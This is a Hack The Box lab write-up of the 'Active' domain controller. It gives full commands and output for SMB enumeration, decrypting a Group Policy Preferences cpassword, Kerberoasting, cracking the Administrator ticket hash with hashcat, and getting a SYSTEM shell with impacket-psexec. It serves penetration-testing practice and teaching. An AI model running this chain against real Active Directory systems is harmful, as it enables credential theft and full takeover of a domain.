HTB - Active

12 minute read

Nmap Scan

Lets perform nmap scan on the target machine,

┌──(kaliaidenpearce369)-[~]
└─$ nmap -sV -sC -A 10.10.10.100   
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-28 11:47 EDT
Nmap scan report for 10.10.10.100
Host is up (0.21s latency).
Not shown: 981 closed tcp ports (conn-refused)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-03-28 15:52:10Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
49152/tcp open  msrpc         Microsoft Windows RPC
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC
49165/tcp open  msrpc         Microsoft Windows RPC
49176/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 4m08s
| smb2-security-mode: 
|   2.1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2022-03-28T15:53:11
|_  start_date: 2022-03-28T15:45:15

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 124.82 seconds

Now lets scan other ports too

┌──(kaliaidenpearce369)-[~]
└─$ nmap -p1-10000 -T4 10.10.10.100
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-28 11:49 EDT
Warning: 10.10.10.100 giving up on port because retransmission cap hit (6).
Nmap scan report for 10.10.10.100
Host is up (0.21s latency).
Not shown: 9848 closed tcp ports (conn-refused), 139 filtered tcp ports (no-response)
PORT     STATE SERVICE
53/tcp   open  domain
88/tcp   open  kerberos-sec
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
389/tcp  open  ldap
445/tcp  open  microsoft-ds
464/tcp  open  kpasswd5
593/tcp  open  http-rpc-epmap
636/tcp  open  ldapssl
3268/tcp open  globalcatLDAP
3269/tcp open  globalcatLDAPssl
5722/tcp open  msdfsr
9389/tcp open  adws

Nmap done: 1 IP address (1 host up) scanned in 399.92 seconds

Enumeration

It seems like this target machine is a Domain Controller with domain active.htb, because it has 53/tcp open domain and 389/tcp open ldap

Enumerating RPC

Using null login on RPC, we could not get any information because we are not authenticated

┌──(kaliaidenpearce369)-[~]
└─$ rpcclient 10.10.10.100 -U "" -N         
rpcclient $> enumdom
enumdomains    enumdomgroups  enumdomusers   
rpcclient $> enumdomains
Could not initialise samr. Error was NT_STATUS_ACCESS_DENIED
rpcclient $> enumdomusers 
Could not initialise samr. Error was NT_STATUS_ACCESS_DENIED
rpcclient $> enumdomgroups 
Could not initialise samr. Error was NT_STATUS_ACCESS_DENIED

Enumerating SMB

Lets try to enumerate the SMB share,

┌──(kaliaidenpearce369)-[~]
└─$ smbmap -H 10.10.10.100                 
[+] IP: 10.10.10.100:445        Name: 10.10.10.100                                      
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        IPC$                                                    NO ACCESS       Remote IPC
        NETLOGON                                                NO ACCESS       Logon server share 
        Replication                                             READ ONLY
        SYSVOL                                                  NO ACCESS       Logon server share 
        Users                                                   NO ACCESS

Here we can see that, using null login we can access Replication share

Lets try to dig in it,

┌──(kaliaidenpearce369)-[~]
└─$ smbclient \\\\10.10.10.100\\Replication\\
Enter WORKGROUP\kali's password: 
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat Jul 21 06:37:44 2018
  ..                                  D        0  Sat Jul 21 06:37:44 2018
  active.htb                          D        0  Sat Jul 21 06:37:44 2018

                5217023 blocks of size 4096. 279183 blocks available
smb: \> cd active.htb
smb: \active.htb\> ls
  .                                   D        0  Sat Jul 21 06:37:44 2018
  ..                                  D        0  Sat Jul 21 06:37:44 2018
  DfsrPrivate                       DHS        0  Sat Jul 21 06:37:44 2018
  Policies                            D        0  Sat Jul 21 06:37:44 2018
  scripts                             D        0  Wed Jul 18 14:48:57 2018

                5217023 blocks of size 4096. 279183 blocks available

Enumerating the directories inside this share,

Out of these three directories, Policies had some GPO information in it

smb: \active.htb\> cd Policies\
smb: \active.htb\Policies\> ls
  .                                   D        0  Sat Jul 21 06:37:44 2018
  ..                                  D        0  Sat Jul 21 06:37:44 2018
  {31B2F340-016D-11D2-945F-00C04FB984F9}      D        0  Sat Jul 21 06:37:44 2018
  {6AC1786C-016F-11D2-945F-00C04fB984F9}      D        0  Sat Jul 21 06:37:44 2018

                5217023 blocks of size 4096. 279183 blocks available

After switching multiple directories,

smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\> cd Groups\
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> ls
  .                                   D        0  Sat Jul 21 06:37:44 2018
  ..                                  D        0  Sat Jul 21 06:37:44 2018
  Groups.xml                          A      533  Wed Jul 18 16:46:06 2018

                5217023 blocks of size 4096. 279183 blocks available
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> more Groups.xml 
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml of size 533 as /tmp/smbmore.f6tMHn (0.4 KiloBytes/sec) (average 0.6 KiloBytes/sec)


...

<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>
/tmp/smbmore.R7WEDD (END)

Actually this is a GPP file (Group Policy Preferences) used to set password for the specific user, where the password is encrypted using AES-256 bit key

These files are usually found in SYSVOL share where authenticated domain users will have access

Initial Access

Since we found an XML file named Groups.xml which contains cpassword, we can definitely say it is an GPP

Now decrypting the encrypted password to plain text,

┌──(kaliaidenpearce369)-[~]
└─$ gpp-decrypt "edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"  
GPPstillStandingStrong2k18
┌──(kaliaidenpearce369)-[~]
└─$ gpp-decrypt "edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"  
GPPstillStandingStrong2k18

So we got the credentials now, but if we try to spawn shell by evil-winrm it would not work, because wsman protocol is not available, therefore no PS-Remoting

┌──(kaliaidenpearce369)-[~]
└─$ evil-winrm -u svc_tgs -p GPPstillStandingStrong2k18 -i 10.10.10.100 

Evil-WinRM shell v3.3

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

Error: An error of type Errno::ECONNREFUSED happened, message is Connection refused - Connection refused - connect(2) for "10.10.10.100" port 5985 (10.10.10.100:5985)

Error: Exiting with code 1

Even if we try using impacket-psexec it would fail because there are no writable shares for this user,

┌──(kaliaidenpearce369)-[~]
└─$ impacket-psexec active.htb/svc_tgs:GPPstillStandingStrong2k18@10.10.10.100 
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[*] Requesting shares on 10.10.10.100.....
[-] share 'ADMIN$' is not writable.
[-] share 'C$' is not writable.
[-] share 'NETLOGON' is not writable.
[-] share 'Replication' is not writable.
[-] share 'SYSVOL' is not writable.
[-] share 'Users' is not writable.

Lets try authenticating in smbmap to find privileges on shares,

┌──(kaliaidenpearce369)-[~]
└─$ smbmap -H 10.10.10.100 -u "svc_tgs" -p "GPPstillStandingStrong2k18"
[+] IP: 10.10.10.100:445        Name: 10.10.10.100                                      
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        IPC$                                                    NO ACCESS       Remote IPC
        NETLOGON                                                READ ONLY       Logon server share 
        Replication                                             READ ONLY
        SYSVOL                                                  READ ONLY       Logon server share 
        Users                                                   READ ONLY

As you can see here, SYSVOL share contains the same info as Replication share, which is obviously replicated

┌──(kaliaidenpearce369)-[~]
└─$ smbclient \\\\10.10.10.100\\SYSVOL\\ -U "svc_tgs"                          
Enter WORKGROUP\svc_tgs's password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Wed Jul 18 14:48:57 2018
  ..                                  D        0  Wed Jul 18 14:48:57 2018
  active.htb                         Dr        0  Wed Jul 18 14:48:57 2018

                5217023 blocks of size 4096. 279149 blocks available
smb: \> 

GPP XMLs will be always stored inside SYSVOL share, which is a potential place for finding sensitive information

Nothing inside NETLOGON share,

┌──(kaliaidenpearce369)-[~]
└─$ smbclient \\\\10.10.10.100\\NETLOGON\\ -U "svc_tgs"
Enter WORKGROUP\svc_tgs's password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Wed Jul 18 14:48:57 2018
  ..                                  D        0  Wed Jul 18 14:48:57 2018

                5217023 blocks of size 4096. 279167 blocks available
smb: \> exit

Accessing Users share,

┌──(kaliaidenpearce369)-[~]
└─$ smbclient \\\\10.10.10.100\\Users\\ -U "svc_tgs"
Enter WORKGROUP\svc_tgs's password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                  DR        0  Sat Jul 21 10:39:20 2018
  ..                                 DR        0  Sat Jul 21 10:39:20 2018
  Administrator                       D        0  Mon Jul 16 06:14:21 2018
  All Users                       DHSrn        0  Tue Jul 14 01:06:44 2009
  Default                           DHR        0  Tue Jul 14 02:38:21 2009
  Default User                    DHSrn        0  Tue Jul 14 01:06:44 2009
  desktop.ini                       AHS      174  Tue Jul 14 00:57:55 2009
  Public                             DR        0  Tue Jul 14 00:57:55 2009
  SVC_TGS                             D        0  Sat Jul 21 11:16:32 2018

                5217023 blocks of size 4096. 279167 blocks available

We are in the C:\Users directory, lets enumerate our current user directory

┌──(kaliaidenpearce369)-[~]
└─$ smbclient \\\\10.10.10.100\\Users\\ -U "svc_tgs"
Enter WORKGROUP\svc_tgs's password: 
Try "help" to get a list of possible commands.
smb: \> ld
ld: command not found
smb: \> ls
  .                                  DR        0  Sat Jul 21 10:39:20 2018
  ..                                 DR        0  Sat Jul 21 10:39:20 2018
  Administrator                       D        0  Mon Jul 16 06:14:21 2018
  All Users                       DHSrn        0  Tue Jul 14 01:06:44 2009
  Default                           DHR        0  Tue Jul 14 02:38:21 2009
  Default User                    DHSrn        0  Tue Jul 14 01:06:44 2009
  desktop.ini                       AHS      174  Tue Jul 14 00:57:55 2009
  Public                             DR        0  Tue Jul 14 00:57:55 2009
  SVC_TGS                             D        0  Sat Jul 21 11:16:32 2018

                5217023 blocks of size 4096. 279167 blocks available
smb: \> more SVC_TGS\Desktop\user.txt
getting file \SVC_TGS\Desktop\user.txt of size 34 as /tmp/smbmore.A8s6xe (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)

But we dont have privileges to access Administrator

smb: \> cd Administrator\
smb: \Administrator\> ls
NT_STATUS_ACCESS_DENIED listing \Administrator\*
smb: \Administrator\> 

Kerberoasting

Using impacket tools to enumerate the AD domain further,

┌──(kaliaidenpearce369)-[~]
└─$ impacket-GetADUsers active.htb/svc_tgs:GPPstillStandingStrong2k18  -dc-ip 10.10.10.100
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[*] Querying 10.10.10.100 for information about domain.
Name                  Email                           PasswordLastSet      LastLogon           
--------------------  ------------------------------  -------------------  -------------------

Using this user we could not get the users inside the domain, which means LDAP query would also fail

Since we have an active real account inside a domain, we can try kerberoasting

Listing the SPNs inside the domain to Kerberoast,

┌──(kaliaidenpearce369)-[~]
└─$ impacket-GetUserSPNs active.htb/svc_tgs:GPPstillStandingStrong2k18  -dc-ip 10.10.10.100 

Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation 
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 15:06:40.351723  2022-03-28 11:46:22.672953             

Now requesting the TGS where the service account password will be encrypted,

┌──(kaliaidenpearce369)-[~]
└─$ impacket-GetUserSPNs active.htb/svc_tgs:GPPstillStandingStrong2k18  -dc-ip 10.10.10.100  -request
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation 
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 15:06:40.351723  2022-03-28 11:46:22.672953             



$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$ad54e0beff6330bcf94eede8721f79a8$2e486193c1d5c8fb964a44ce0255c99f48e11afdcbc70a972f4f34ca449d8270728c77340cc121a087bd850f210d3f0adefb48dbb120173f02324d327eeaf1c48bd9a34bead1a836376a1a1df1ca0ca508e0bb6dc4a41c8e635253a36fdfbb1771675cae1f82909ac12e023530c9abf645280a35e59c1e1c4b6618841cc7302ea5f426dc77d401ff61d63ed61f1ade12ebb9baacf5760b863211eba04f9cc8424ef4ba55115f8682db1625faa0d24bbf6d281298101f9dc974dd006914dfe6998f17736cb952ff2cfd7f5045f88c5104fdfd7c58882822a58cb1a6c0cf2b029983d19b61a0fc290174ed4efd0c03c4f715f6fb0bdd2fc075c314825835adeea790c6429720db46ace79e20e27c42e26d45d3ccd9e6bd0c1d6d1720cf156231830b2c06b1d8acc20e60e58dfc0e3753604ad0eed74cb6a94dff2ccf2203a00717beb15dee2d4f10cc727da976e16179d71c1b0346fe28dcf47d57d67f94561738236edcff43aa5cf58fa8b9d23135d8a9504340716918c8f2492b984dc25aa7267979e4013a87483f601ccfd7f1249c969bc3fecc7a29cc1614c049746a50defb972edf434fb6ec68a97d7a49adf656ebf8e3ecf32f72a327a13aa790df346c9104f5e16b5c9c967dd40c1be077d07a2101c61d4197aa826df95dc98a89c5366af36151462865775dbcd12a967bc5e64ca690ab759d76ea9acc0674641b52b324a9c6f12fdde0ce6895433f65ca593d60f5b10dba073dba88580b3f5460ee01178427e243cf4ee5e64287b9318dfb9b5c4c7d691a982ec405c083463d7b8b655331ed9746ca888fb8908a973ebb40f095bf17c219fed918d09ab44ae01bb48344d8facd2079cf01bc8540c8675161cc3167d206a5795fcec81abd11c954561e2efd3c57428c6d4cf1fa5434de35a856a8b8322d06477abcd72c7dce490bd30707d8c32477338d125316ee56fd003c1451f208054dbe69c60cb3b17c7efe328520d7bfe04f5ba95cfdcfe4668e00165c67e53ecae1b1eea168db3c6ba79833eec48ec7043f054516c8fa302f29a6af9273f5503534df7ccae992d7c495154ca913a6c3e62c0e4c6b2348a209879a1e59d539bc7197f06268a067489c689ad96b870906098a1443eedaf0e4e7c0e3ab91b5e5b073e67646dcf00534899588879f51e93d62f818d3e82992ba06b37fc4e79689d74ecc57abe4de7f142d29f956b55936c7899e24009e8aa532e21079915394c6f82f7be81989a33dd9

Now cracking the TGT using hashcat,

┌──(aidenpearce369ragnar)-[~]
└─$ hashcat -h | grep 13100
  13100 | Kerberos 5 TGS-REP etype 23                      | Network Protocols
                                                                                                    
┌──(aidenpearce369ragnar)-[~]
└─$ hashcat -m 13100 '$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$ad54e0beff6330bcf94eede8721f79a8$2e486193c1d5c8fb964a44ce0255c99f48e11afdcbc70a972f4f34ca449d8270728c77340cc121a087bd850f210d3f0adefb48dbb120173f02324d327eeaf1c48bd9a34bead1a836376a1a1df1ca0ca508e0bb6dc4a41c8e635253a36fdfbb1771675cae1f82909ac12e023530c9abf645280a35e59c1e1c4b6618841cc7302ea5f426dc77d401ff61d63ed61f1ade12ebb9baacf5760b863211eba04f9cc8424ef4ba55115f8682db1625faa0d24bbf6d281298101f9dc974dd006914dfe6998f17736cb952ff2cfd7f5045f88c5104fdfd7c58882822a58cb1a6c0cf2b029983d19b61a0fc290174ed4efd0c03c4f715f6fb0bdd2fc075c314825835adeea790c6429720db46ace79e20e27c42e26d45d3ccd9e6bd0c1d6d1720cf156231830b2c06b1d8acc20e60e58dfc0e3753604ad0eed74cb6a94dff2ccf2203a00717beb15dee2d4f10cc727da976e16179d71c1b0346fe28dcf47d57d67f94561738236edcff43aa5cf58fa8b9d23135d8a9504340716918c8f2492b984dc25aa7267979e4013a87483f601ccfd7f1249c969bc3fecc7a29cc1614c049746a50defb972edf434fb6ec68a97d7a49adf656ebf8e3ecf32f72a327a13aa790df346c9104f5e16b5c9c967dd40c1be077d07a2101c61d4197aa826df95dc98a89c5366af36151462865775dbcd12a967bc5e64ca690ab759d76ea9acc0674641b52b324a9c6f12fdde0ce6895433f65ca593d60f5b10dba073dba88580b3f5460ee01178427e243cf4ee5e64287b9318dfb9b5c4c7d691a982ec405c083463d7b8b655331ed9746ca888fb8908a973ebb40f095bf17c219fed918d09ab44ae01bb48344d8facd2079cf01bc8540c8675161cc3167d206a5795fcec81abd11c954561e2efd3c57428c6d4cf1fa5434de35a856a8b8322d06477abcd72c7dce490bd30707d8c32477338d125316ee56fd003c1451f208054dbe69c60cb3b17c7efe328520d7bfe04f5ba95cfdcfe4668e00165c67e53ecae1b1eea168db3c6ba79833eec48ec7043f054516c8fa302f29a6af9273f5503534df7ccae992d7c495154ca913a6c3e62c0e4c6b2348a209879a1e59d539bc7197f06268a067489c689ad96b870906098a1443eedaf0e4e7c0e3ab91b5e5b073e67646dcf00534899588879f51e93d62f818d3e82992ba06b37fc4e79689d74ecc57abe4de7f142d29f956b55936c7899e24009e8aa532e21079915394c6f82f7be81989a33dd9' /opt/wordlists/rockyou.txt 
hashcat (v5.1.0) starting...

* Device #1: WARNING! Kernel exec timeout is not disabled.
             This may cause "CL_OUT_OF_RESOURCES" or related errors.
             To disable the timeout, see: https://hashcat.net/q/timeoutpatch
nvmlDeviceGetFanSpeed(): Not Supported

OpenCL Platform #1: NVIDIA Corporation
======================================
* Device #1: NVIDIA GeForce RTX 3050 Laptop GPU, 977/3910 MB allocatable, 16MCU

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

ATTENTION! Pure (unoptimized) OpenCL kernels selected.
This enables cracking passwords and salts > length 32 but for the price of drastically reduced performance.
If you want to switch to optimized OpenCL kernels, append -O to your commandline.

Watchdog: Temperature abort trigger set to 90c

* Device #1: build_opts '-cl-std=CL1.2 -I OpenCL -I /usr/share/hashcat/OpenCL -D LOCAL_MEM_TYPE=1 -D VENDOR_ID=32 -D CUDA_ARCH=806 -D AMD_ROCM=0 -D VECT_SIZE=1 -D DEVICE_TYPE=4 -D DGST_R0=0 -D DGST_R1=1 -D DGST_R2=2 -D DGST_R3=3 -D DGST_ELEM=4 -D KERN_TYPE=13100 -D _unroll'
* Device #1: Kernel m13100_a0-pure.6034fa15.kernel not found in cache! Building may take a while...


Dictionary cache hit:
* Filename..: /opt/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$ad54e0beff6330bcf94eede8721f79a8$2e486193c1d5c8fb964a44ce0255c99f48e11afdcbc70a972f4f34ca449d8270728c77340cc121a087bd850f210d3f0adefb48dbb120173f02324d327eeaf1c48bd9a34bead1a836376a1a1df1ca0ca508e0bb6dc4a41c8e635253a36fdfbb1771675cae1f82909ac12e023530c9abf645280a35e59c1e1c4b6618841cc7302ea5f426dc77d401ff61d63ed61f1ade12ebb9baacf5760b863211eba04f9cc8424ef4ba55115f8682db1625faa0d24bbf6d281298101f9dc974dd006914dfe6998f17736cb952ff2cfd7f5045f88c5104fdfd7c58882822a58cb1a6c0cf2b029983d19b61a0fc290174ed4efd0c03c4f715f6fb0bdd2fc075c314825835adeea790c6429720db46ace79e20e27c42e26d45d3ccd9e6bd0c1d6d1720cf156231830b2c06b1d8acc20e60e58dfc0e3753604ad0eed74cb6a94dff2ccf2203a00717beb15dee2d4f10cc727da976e16179d71c1b0346fe28dcf47d57d67f94561738236edcff43aa5cf58fa8b9d23135d8a9504340716918c8f2492b984dc25aa7267979e4013a87483f601ccfd7f1249c969bc3fecc7a29cc1614c049746a50defb972edf434fb6ec68a97d7a49adf656ebf8e3ecf32f72a327a13aa790df346c9104f5e16b5c9c967dd40c1be077d07a2101c61d4197aa826df95dc98a89c5366af36151462865775dbcd12a967bc5e64ca690ab759d76ea9acc0674641b52b324a9c6f12fdde0ce6895433f65ca593d60f5b10dba073dba88580b3f5460ee01178427e243cf4ee5e64287b9318dfb9b5c4c7d691a982ec405c083463d7b8b655331ed9746ca888fb8908a973ebb40f095bf17c219fed918d09ab44ae01bb48344d8facd2079cf01bc8540c8675161cc3167d206a5795fcec81abd11c954561e2efd3c57428c6d4cf1fa5434de35a856a8b8322d06477abcd72c7dce490bd30707d8c32477338d125316ee56fd003c1451f208054dbe69c60cb3b17c7efe328520d7bfe04f5ba95cfdcfe4668e00165c67e53ecae1b1eea168db3c6ba79833eec48ec7043f054516c8fa302f29a6af9273f5503534df7ccae992d7c495154ca913a6c3e62c0e4c6b2348a209879a1e59d539bc7197f06268a067489c689ad96b870906098a1443eedaf0e4e7c0e3ab91b5e5b073e67646dcf00534899588879f51e93d62f818d3e82992ba06b37fc4e79689d74ecc57abe4de7f142d29f956b55936c7899e24009e8aa532e21079915394c6f82f7be81989a33dd9:Ticketmaster1968
                                                 
Session..........: hashcat
Status...........: Cracked
Hash.Type........: Kerberos 5 TGS-REP etype 23
Hash.Target......: $krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Ad...a33dd9
Time.Started.....: Mon Mar 28 22:44:51 2022 (1 sec)
Time.Estimated...: Mon Mar 28 22:44:52 2022 (0 secs)
Guess.Base.......: File (/opt/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 13938.0 kH/s (5.93ms) @ Accel:512 Loops:1 Thr:64 Vec:1
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 11010048/14344385 (76.76%)
Rejected.........: 0/11010048 (0.00%)
Restore.Point....: 10485760/14344385 (73.10%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: XiaoNianNian -> Joytjiong1
Hardware.Mon.#1..: Temp: 56c Util: 36% Core:1500MHz Mem:5500MHz Bus:4

Started: Mon Mar 28 22:44:46 2022
Stopped: Mon Mar 28 22:44:52 2022
                                               

So the password for the Administrator which is considered as SPN is Ticketmaster1968

Lateral Movement

Since there is no PS-Remoting, lets spawn shell using psexec because for Administrator all shares will have write permission

Also, we can login via smbclient to access Users share

┌──(kaliaidenpearce369)-[~]
└─$ impacket-psexec active.htb/Administrator:Ticketmaster1968@10.10.10.100
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[*] Requesting shares on 10.10.10.100.....
[*] Found writable share ADMIN$
[*] Uploading file NhCLSxlY.exe
[*] Opening SVCManager on 10.10.10.100.....
[*] Creating service JxpB on 10.10.10.100.....
[*] Starting service JxpB.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32> hostname
DC

C:\Windows\system32> cd C:\Users\Administrator\Desktop\
 
C:\Users\Administrator\Desktop> more root.txt
<ROOT FLAG>